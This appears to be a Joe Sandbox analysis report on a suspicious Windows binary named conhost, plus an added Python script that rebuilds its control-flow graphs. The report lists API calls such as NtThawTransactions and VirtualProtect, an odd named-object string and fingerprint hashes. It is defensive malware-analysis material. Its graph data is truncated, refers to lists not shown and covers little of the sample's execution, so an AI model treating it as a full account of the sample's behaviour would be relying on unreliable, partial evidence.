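The per-function "Control-flow Graph" edge lists above (for example the one starting "control_flow_graph 307 7ff758ee1e10-7ff758ee1e2d") and the "Execution Graph" edge list that follows survive on this page only as flat token streams; the rendered graphs are not part of the text. The following Python is an added example, not part of the Joe Sandbox report: it rebuilds nodes and edges from that text so the API on each node can be listed together with the basic blocks that reach it, which is the question an analyst actually asks of these graphs (for instance, which block calls VirtualProtect). The token rules are inferred from the visible format and are an assumption: a short decimal id followed by a hex address or address range starts a node, `a->b` is an edge, and any other word is label text for the preceding node. The two sample strings are copied from this page.

```python
"""Rebuild Joe Sandbox control-flow / execution graphs from their text dumps.

Added example, not code from Joe Sandbox. Token rules are inferred from the
page's own edge lists (assumption): '<id> <hexaddr[-hexaddr]>' opens a node,
'<id>-><id>' is an edge, everything else labels the current node.
"""
import re
from collections import defaultdict

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
ADDR_RE = re.compile(r"^[0-9a-fA-F]{7,}(-[0-9a-fA-F]{7,})?$")
# Label words that are graph annotations, not function names.
ANNOTATION_WORDS = {"API", "calls", "call"}

# Copied from this page: the first edges of the Execution Graph and the
# control-flow graph of the _matherr wrapper at 7ff758ee1800.
EXEC_GRAPH_SAMPLE = (
    "execution_graph 2825 140001ac3 2830 140001a70 2825->2830 2826 140001b36 "
    "2829 140001ba0 4 API calls 2826->2829 2827 14000199e 2828 140001a0f 2827->2828 "
    "2832 1400019e9 VirtualProtect 2827->2832 2831 140001b53 2829->2831 2830->2826 "
    "2830->2827 2830->2831 2832->2827"
)
CFG_SAMPLE = (
    "control_flow_graph 387 7ff758ee1800-7ff758ee1810 388 7ff758ee1824 387->388 "
    "389 7ff758ee1812-7ff758ee1822 387->389 390 7ff758ee182b-7ff758ee1867 "
    "call 7ff758ee2290 fprintf 388->390 389->390"
)


def parse_graph(text):
    """Return ({node_id: (address, label)}, [(src, dst), ...])."""
    tokens = text.split()
    nodes, edges, current, i = {}, [], None, 0
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE_RE.match(tok)
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
            i += 1
        elif tok.isdigit() and len(tok) <= 6 and i + 1 < len(tokens) \
                and ADDR_RE.match(tokens[i + 1]):
            current = int(tok)                       # new node: id + address/range
            nodes[current] = (tokens[i + 1], [])
            i += 2
        else:
            # Label text ('VirtualProtect', '4 API calls', 'call 7ff758ee9f80');
            # the leading 'execution_graph'/'control_flow_graph' word has no
            # node yet and is dropped.
            if current is not None:
                nodes[current][1].append(tok)
            i += 1
    return {k: (addr, " ".join(words)) for k, (addr, words) in nodes.items()}, edges


def api_calls(nodes):
    """Map each API/function name in a node label to the addresses that call it."""
    result = defaultdict(set)
    for addr, label in nodes.values():
        for word in label.split():
            if word in ANNOTATION_WORDS or word.isdigit() or ADDR_RE.match(word):
                continue                             # counts and internal call targets
            result[word].add(addr)
    return {k: sorted(v) for k, v in result.items()}


def callers_of(nodes, edges, api):
    """Addresses of the blocks with an edge into a block that calls `api`."""
    targets = {nid for nid, (_, label) in nodes.items() if api in label.split()}
    return sorted(nodes[src][0] for src, dst in edges if dst in targets and src in nodes)


def reachable(edges, start):
    """Node ids reachable from `start` (inclusive) by following edges."""
    succ = defaultdict(list)
    for src, dst in edges:
        succ[src].append(dst)
    seen, stack = {start}, [start]
    while stack:
        for dst in succ[stack.pop()]:
            if dst not in seen:
                seen.add(dst)
                stack.append(dst)
    return seen


def apis_reachable(nodes, edges, start):
    """Sorted API names on any node reachable from `start`."""
    sub = {nid: nodes[nid] for nid in reachable(edges, start) if nid in nodes}
    return sorted(api_calls(sub))


if __name__ == "__main__":
    for sample in (EXEC_GRAPH_SAMPLE, CFG_SAMPLE):
        nodes, edges = parse_graph(sample)
        print(len(nodes), "nodes,", len(edges), "edges")
        for api, addrs in api_calls(nodes).items():
            print("  %s at %s, reached from %s" % (api, addrs, callers_of(nodes, edges, api)))
```

Two caveats when reading the result. Summary nodes such as "4 API calls" only carry a count, so the names behind them are recovered only where the page expands that callee elsewhere (here, the block at 140001ba0 is the VirtualQuery/VirtualProtect/memcpy/GetLastError routine listed above). And the executed versus not-executed colouring of the rendered graph is not present in the text, so reachability here means reachable in the static graph, not observed at runtime; the report's 2.4% execution coverage figure is the reminder that most of these blocks never ran in the sandbox.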

                                          Execution Graph

                                          Execution Coverage:2.4%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:0%
                                          Total number of Nodes:828
                                          Total number of Limit Nodes:2
                                          execution_graph 2825 140001ac3 2830 140001a70 2825->2830 2826 140001b36 2829 140001ba0 4 API calls 2826->2829 2827 14000199e 2828 140001a0f 2827->2828 2832 1400019e9 VirtualProtect 2827->2832 2831 140001b53 2829->2831 2830->2826 2830->2827 2830->2831 2832->2827 1995 140001ae4 1997 140001a70 1995->1997 1996 140001b36 2003 140001ba0 1996->2003 1997->1996 1998 14000199e 1997->1998 2001 140001b53 1997->2001 1999 140001a0f 1998->1999 2002 1400019e9 VirtualProtect 1998->2002 2002->1998 2005 140001bc2 2003->2005 2004 140001c04 memcpy 2004->2001 2005->2004 2007 140001c45 VirtualQuery 2005->2007 2008 140001cf4 2005->2008 2007->2008 2012 140001c72 2007->2012 2009 140001d23 GetLastError 2008->2009 2010 140001d37 2009->2010 2011 140001ca4 VirtualProtect 2011->2004 2011->2009 2012->2004 2012->2011 2031 140001404 2104 140001394 2031->2104 2033 140001413 2034 140001394 2 API calls 2033->2034 2035 140001422 2034->2035 2036 140001394 2 API calls 2035->2036 2037 140001431 2036->2037 2038 140001394 2 API calls 2037->2038 2039 140001440 2038->2039 2040 140001394 2 API calls 2039->2040 2041 14000144f 2040->2041 2042 140001394 2 API calls 2041->2042 2043 14000145e 2042->2043 2044 140001394 2 API calls 2043->2044 2045 14000146d 2044->2045 2046 140001394 2 API calls 2045->2046 2047 14000147c 2046->2047 2048 140001394 2 API calls 2047->2048 2049 14000148b 2048->2049 2050 140001394 2 API calls 2049->2050 2051 14000149a 2050->2051 2052 140001394 2 API calls 2051->2052 2053 1400014a9 2052->2053 2054 140001394 2 API calls 2053->2054 2055 1400014b8 2054->2055 2056 140001394 2 API calls 2055->2056 2057 1400014c7 2056->2057 2058 140001394 2 API calls 2057->2058 2059 1400014d6 2058->2059 2060 1400014e5 2059->2060 2061 140001394 2 API calls 2059->2061 2062 140001394 2 API calls 2060->2062 2061->2060 2063 1400014ef 2062->2063 2064 1400014f4 2063->2064 2065 140001394 2 API calls 2063->2065 2066 140001394 2 API calls 2064->2066 2065->2064 2067 1400014fe 
2066->2067 2068 140001503 2067->2068 2069 140001394 2 API calls 2067->2069 2070 140001394 2 API calls 2068->2070 2069->2068 2071 14000150d 2070->2071 2072 140001394 2 API calls 2071->2072 2073 140001512 2072->2073 2074 140001394 2 API calls 2073->2074 2075 140001521 2074->2075 2076 140001394 2 API calls 2075->2076 2077 140001530 2076->2077 2078 140001394 2 API calls 2077->2078 2079 14000153f 2078->2079 2080 140001394 2 API calls 2079->2080 2081 14000154e 2080->2081 2082 140001394 2 API calls 2081->2082 2083 14000155d 2082->2083 2084 140001394 2 API calls 2083->2084 2085 14000156c 2084->2085 2086 140001394 2 API calls 2085->2086 2087 14000157b 2086->2087 2088 140001394 2 API calls 2087->2088 2089 14000158a 2088->2089 2090 140001394 2 API calls 2089->2090 2091 140001599 2090->2091 2092 140001394 2 API calls 2091->2092 2093 1400015a8 2092->2093 2094 140001394 2 API calls 2093->2094 2095 1400015b7 2094->2095 2096 140001394 2 API calls 2095->2096 2097 1400015c6 2096->2097 2098 140001394 2 API calls 2097->2098 2099 1400015d5 2098->2099 2100 140001394 2 API calls 2099->2100 2101 1400015e4 2100->2101 2102 140001394 2 API calls 2101->2102 2103 1400015f3 2102->2103 2105 140005a90 malloc 2104->2105 2106 1400013b8 2105->2106 2107 1400013c6 NtThawTransactions 2106->2107 2107->2033 2108 140002104 2109 140002111 EnterCriticalSection 2108->2109 2110 140002218 2108->2110 2111 14000220b LeaveCriticalSection 2109->2111 2115 14000212e 2109->2115 2112 140002272 2110->2112 2114 140002241 DeleteCriticalSection 2110->2114 2111->2110 2113 14000214d TlsGetValue GetLastError 2113->2115 2114->2112 2115->2111 2115->2113 2013 14000216f 2014 140002185 2013->2014 2015 140002178 InitializeCriticalSection 2013->2015 2015->2014 2016 140001a70 2017 14000199e 2016->2017 2021 140001a7d 2016->2021 2018 140001a0f 2017->2018 2019 1400019e9 VirtualProtect 2017->2019 2019->2017 2020 140001b53 2021->2016 2021->2020 2022 140001b36 2021->2022 2023 140001ba0 4 API calls 2022->2023 2023->2020 2833 140002050 2834 
14000205e EnterCriticalSection 2833->2834 2835 1400020cf 2833->2835 2836 1400020c2 LeaveCriticalSection 2834->2836 2837 140002079 2834->2837 2836->2835 2837->2836 2838 140001fd0 2839 140001fe4 2838->2839 2840 140002033 2838->2840 2839->2840 2841 140001ffd EnterCriticalSection LeaveCriticalSection 2839->2841 2841->2840 2124 140001ab3 2125 140001a70 2124->2125 2125->2124 2126 140001b36 2125->2126 2127 14000199e 2125->2127 2130 140001b53 2125->2130 2129 140001ba0 4 API calls 2126->2129 2128 140001a0f 2127->2128 2131 1400019e9 VirtualProtect 2127->2131 2129->2130 2131->2127 1985 140001394 1989 140005a90 1985->1989 1987 1400013b8 1988 1400013c6 NtThawTransactions 1987->1988 1990 140005aae 1989->1990 1993 140005adb 1989->1993 1990->1987 1991 140005b83 1992 140005b9f malloc 1991->1992 1994 140005bc0 1992->1994 1993->1990 1993->1991 1994->1990 2116 14000219e 2117 140002272 2116->2117 2118 1400021ab EnterCriticalSection 2116->2118 2119 140002265 LeaveCriticalSection 2118->2119 2121 1400021c8 2118->2121 2119->2117 2120 1400021e9 TlsGetValue GetLastError 2120->2121 2121->2119 2121->2120 2024 140001800 2025 140001812 2024->2025 2026 140001835 fprintf 2025->2026 2027 140001000 2028 14000108b __set_app_type 2027->2028 2029 140001040 2027->2029 2030 1400010b6 2028->2030 2029->2028 2122 140002320 strlen 2123 140002337 2122->2123 2132 140001140 2135 140001160 2132->2135 2134 140001156 2136 1400011b9 2135->2136 2137 14000118b 2135->2137 2138 1400011d3 2136->2138 2139 1400011c7 _amsg_exit 2136->2139 2137->2136 2140 1400011a0 Sleep 2137->2140 2141 140001201 _initterm 2138->2141 2142 14000121a 2138->2142 2139->2138 2140->2136 2140->2137 2141->2142 2158 140001880 2142->2158 2145 14000126a 2146 14000126f malloc 2145->2146 2147 14000128b 2146->2147 2149 1400012d0 2146->2149 2148 1400012a0 strlen malloc memcpy 2147->2148 2148->2148 2148->2149 2169 140003160 2149->2169 2151 140001315 2152 140001344 2151->2152 2153 140001324 2151->2153 2156 140001160 52 API calls 2152->2156 2154 140001338 
                                          (Control-flow graph: interactive edge-list rendering not reproduced in text.)

                                          Callgraph

                                          (Callgraph: interactive edge-list rendering not reproduced in text.)

                                          Control-flow Graph

                                          APIs
                                          • NtThawTransactions.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001156), ref: 00000001400013F7
                                          Memory Dump Source
                                          • Source File: 0000003C.00000002.346490703757.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                          • Associated: 0000003C.00000002.346490667347.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                          • Associated: 0000003C.00000002.346490752502.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                          • Associated: 0000003C.00000002.346490797779.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                          • Associated: 0000003C.00000002.346490840943.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_60_2_140000000_conhost.jbxd
                                          Similarity
                                          • API ID: ThawTransactions
                                          • String ID:
                                          • API String ID: 578639242-0
                                          • Opcode ID: fa4ca29ffdbb80e8efa36c8b47f0284b0c6112ac4f40b8b01a9a1a958d5a0fea
                                          • Instruction ID: 9f9578cccb19d5e1001a2b70783b1425a960e143c3f7cfc78ac85dbae06a86f6
                                          • Opcode Fuzzy Hash: fa4ca29ffdbb80e8efa36c8b47f0284b0c6112ac4f40b8b01a9a1a958d5a0fea
                                          • Instruction Fuzzy Hash: DCF0AFB2608B408AEA12DF52F89579A77A0F38D7C0F00991ABBC847735DB3CC190CB40

                                          Control-flow Graph

                                          (Control-flow graph: interactive edge-list rendering not reproduced in text.)
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000003C.00000002.346490703757.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                          • Associated: 0000003C.00000002.346490667347.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                          • Associated: 0000003C.00000002.346490752502.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                          • Associated: 0000003C.00000002.346490797779.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                          • Associated: 0000003C.00000002.346490840943.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_60_2_140000000_conhost.jbxd
                                          Similarity
                                          • API ID: wcslen$wcscatwcscpywcsncmp
                                          • String ID: 0$X$\BaseNamedObjects\abwgotxjezxhqvoxfvghoubb$`
                                          • API String ID: 597572034-149918156
                                          • Opcode ID: f82b1d56fbcdcc59e5ec635660479513eccb0500ba3604f01a9d24aae7d58353
                                          • Instruction ID: 1f23fed1b35a9de6ab45ac7882f8aac31199291c16d80d346fc09940143c1c50
                                          • Opcode Fuzzy Hash: f82b1d56fbcdcc59e5ec635660479513eccb0500ba3604f01a9d24aae7d58353
                                          • Instruction Fuzzy Hash: DB1258B2608B8481E762CB16F8443EAB7A4F789794F414215EBA957BF5EF78C189C700

                                          Control-flow Graph

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000003C.00000002.346490703757.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                          • Associated: 0000003C.00000002.346490667347.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                          • Associated: 0000003C.00000002.346490752502.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                          • Associated: 0000003C.00000002.346490797779.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                          • Associated: 0000003C.00000002.346490840943.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_60_2_140000000_conhost.jbxd
                                          Similarity
                                          • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                          • String ID:
                                          • API String ID: 2643109117-0
                                          • Opcode ID: ef832b105ad0a93b86892325d7c46da591e0916a2414edd2e41ce77350403375
                                          • Instruction ID: 40b87442000c13bc5d8894cea73eda9f1f07301f31752595899968347b94dbbc
                                          • Opcode Fuzzy Hash: ef832b105ad0a93b86892325d7c46da591e0916a2414edd2e41ce77350403375
                                          • Instruction Fuzzy Hash: DA5133B1601A4485FB12EF27F9947EA27A5BB8D7C0F408121FB4D873B6DE38C4958300

                                          Control-flow Graph

                                          (Control-flow graph: interactive edge-list rendering not reproduced in text.)
                                          APIs
                                          • VirtualQuery.KERNEL32(?,?,?,?,0000000140007C98,0000000140007C98,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001C63
                                          • VirtualProtect.KERNEL32(?,?,?,?,0000000140007C98,0000000140007C98,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001CC7
                                          • memcpy.MSVCRT ref: 0000000140001CE0
                                          • GetLastError.KERNEL32(?,?,?,?,0000000140007C98,0000000140007C98,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001D23
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000003C.00000002.346490703757.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                          • Associated: 0000003C.00000002.346490667347.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                          • Associated: 0000003C.00000002.346490752502.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                          • Associated: 0000003C.00000002.346490797779.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                          • Associated: 0000003C.00000002.346490840943.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_60_2_140000000_conhost.jbxd
                                          Similarity
                                          • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                          • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                          • API String ID: 2595394609-2123141913
                                          • Opcode ID: 7f9f54528f52ba38c440ef3f049e77ffae0268e46db4b29bcd0fd62edeedcd28
                                          • Instruction ID: fdf3d9dd88e8792b1161c01240395ef5b5338fb4321909a58f15fe856704e636
                                          • Opcode Fuzzy Hash: 7f9f54528f52ba38c440ef3f049e77ffae0268e46db4b29bcd0fd62edeedcd28
                                          • Instruction Fuzzy Hash: 4D4143F1601A4586FA26DF47F884BE927A0E78DBC4F554126EF0E877B1DA38C586C700

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 458 140002104-14000210b 459 140002111-140002128 EnterCriticalSection 458->459 460 140002218-140002221 458->460 461 14000220b-140002212 LeaveCriticalSection 459->461 462 14000212e-14000213c 459->462 463 140002272-140002280 460->463 464 140002223-14000222d 460->464 461->460 465 14000214d-140002159 TlsGetValue GetLastError 462->465 466 140002241-140002263 DeleteCriticalSection 464->466 467 14000222f 464->467 468 14000215b-14000215e 465->468 469 140002140-140002147 465->469 466->463 470 140002230-14000223f 467->470 468->469 471 140002160-14000216d 468->471 469->461 469->465 470->466 471->469
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000003C.00000002.346490703757.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                          • Associated: 0000003C.00000002.346490667347.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                          • Associated: 0000003C.00000002.346490752502.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                          • Associated: 0000003C.00000002.346490797779.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                          • Associated: 0000003C.00000002.346490840943.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_60_2_140000000_conhost.jbxd
                                          Similarity
                                          • API ID: CriticalSection$DeleteEnterErrorLastLeaveValue
                                          • String ID:
                                          • API String ID: 926137887-0
                                          • Opcode ID: 0ffba56e4192c3090559e2b70388a71b78ee459ef6202966799b3bd691e8aca8
                                          • Instruction ID: 793acaa3a830b4be65b1b016115a986f044ad1924a79c217c83acc240df584b7
                                          • Opcode Fuzzy Hash: 0ffba56e4192c3090559e2b70388a71b78ee459ef6202966799b3bd691e8aca8
                                          • Instruction Fuzzy Hash: 3521E3B0705A0292FA5BEB53F9483E92360B76CBD0F444021FB1E476B4DB7A8986C300

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 474 140001880-14000189c 475 1400018a2-1400018f9 call 140002420 call 140002660 474->475 476 140001a0f-140001a1f 474->476 475->476 481 1400018ff-140001910 475->481 482 140001912-14000191c 481->482 483 14000193e-140001941 481->483 484 14000194d-140001954 482->484 485 14000191e-140001929 482->485 483->484 486 140001943-140001947 483->486 489 140001956-140001961 484->489 490 14000199e-1400019a6 484->490 485->484 487 14000192b-14000193a 485->487 486->484 488 140001a20-140001a26 486->488 487->483 492 140001b87-140001b98 call 140001d40 488->492 493 140001a2c-140001a37 488->493 494 140001970-14000199c call 140001ba0 489->494 490->476 491 1400019a8-1400019c1 490->491 495 1400019df-1400019e7 491->495 493->490 496 140001a3d-140001a5f 493->496 494->490 499 1400019e9-140001a0d VirtualProtect 495->499 500 1400019d0-1400019dd 495->500 501 140001a7d-140001a97 496->501 499->500 500->476 500->495 504 140001b74-140001b82 call 140001d40 501->504 505 140001a9d-140001afa 501->505 504->492 511 140001b22-140001b26 505->511 512 140001afc-140001b0e 505->512 515 140001b2c-140001b30 511->515 516 140001a70-140001a77 511->516 513 140001b5c-140001b6c 512->513 514 140001b10-140001b20 512->514 513->504 518 140001b6f call 140001d40 513->518 514->511 514->513 515->516 517 140001b36-140001b57 call 140001ba0 515->517 516->490 516->501 517->513 518->504
                                          APIs
                                          • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001247), ref: 00000001400019F9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000003C.00000002.346490703757.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                          • Associated: 0000003C.00000002.346490667347.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                          • Associated: 0000003C.00000002.346490752502.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                          • Associated: 0000003C.00000002.346490797779.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                          • Associated: 0000003C.00000002.346490840943.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_60_2_140000000_conhost.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                          • API String ID: 544645111-395989641
                                          • Opcode ID: ee5502d3effd7a536878bdf8aefb10f3e022fdfcb9b8ee8412db7f6aa0d5b7eb
                                          • Instruction ID: 5534edb58951571e9cddb68e2d52a890a1341d8cf7b14363ea8337f027b41872
                                          • Opcode Fuzzy Hash: ee5502d3effd7a536878bdf8aefb10f3e022fdfcb9b8ee8412db7f6aa0d5b7eb
                                          • Instruction Fuzzy Hash: 215114B6B11544DAEB12CF67F840BE827A1A759BE8F548212FB1D077B4DB38C986C700

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 522 140001800-140001810 523 140001812-140001822 522->523 524 140001824 522->524 525 14000182b-140001867 call 140002290 fprintf 523->525 524->525
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000003C.00000002.346490703757.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                          • Associated: 0000003C.00000002.346490667347.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                          • Associated: 0000003C.00000002.346490752502.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                          • Associated: 0000003C.00000002.346490797779.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                          • Associated: 0000003C.00000002.346490840943.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_60_2_140000000_conhost.jbxd
                                          Similarity
                                          • API ID: fprintf
                                          • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                          • API String ID: 383729395-3474627141
                                          • Opcode ID: 5380d33896c543ae4d996441b91b9d4166eeb0315ccd011cd80e0432b11e09cd
                                          • Instruction ID: 93f4737d0fcd475ad391b7eda42db172c0a352a5f8679ae3d0accb20e8169252
                                          • Opcode Fuzzy Hash: 5380d33896c543ae4d996441b91b9d4166eeb0315ccd011cd80e0432b11e09cd
                                          • Instruction Fuzzy Hash: 96F09671A14A4482E612EF6AB9417ED6360E75D7C1F50D211FF4D576A5DF3CD182C310

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 528 14000219e-1400021a5 529 140002272-140002280 528->529 530 1400021ab-1400021c2 EnterCriticalSection 528->530 531 140002265-14000226c LeaveCriticalSection 530->531 532 1400021c8-1400021d6 530->532 531->529 533 1400021e9-1400021f5 TlsGetValue GetLastError 532->533 534 1400021f7-1400021fa 533->534 535 1400021e0-1400021e7 533->535 534->535 536 1400021fc-140002209 534->536 535->531 535->533 536->535
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000003C.00000002.346490703757.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                          • Associated: 0000003C.00000002.346490667347.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                          • Associated: 0000003C.00000002.346490752502.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                          • Associated: 0000003C.00000002.346490797779.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                          • Associated: 0000003C.00000002.346490840943.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_60_2_140000000_conhost.jbxd
                                          Similarity
                                          • API ID: CriticalSection$EnterErrorLastLeaveValue
                                          • String ID:
                                          • API String ID: 682475483-0
                                          • Opcode ID: 6aed334ba28e281145827aad8106e07ad7f1f3d084932f70a39d4ad6c8ab7699
                                          • Instruction ID: fd5d896073a876b2497a5a253350f949cfb4402a0739e06ef74f700dacb1e49b
                                          • Opcode Fuzzy Hash: 6aed334ba28e281145827aad8106e07ad7f1f3d084932f70a39d4ad6c8ab7699
                                          • Instruction Fuzzy Hash: 0801AFB5705A0192FA5BDB53FE083E86260B76CBD1F454021EF0953AB4DB798996C200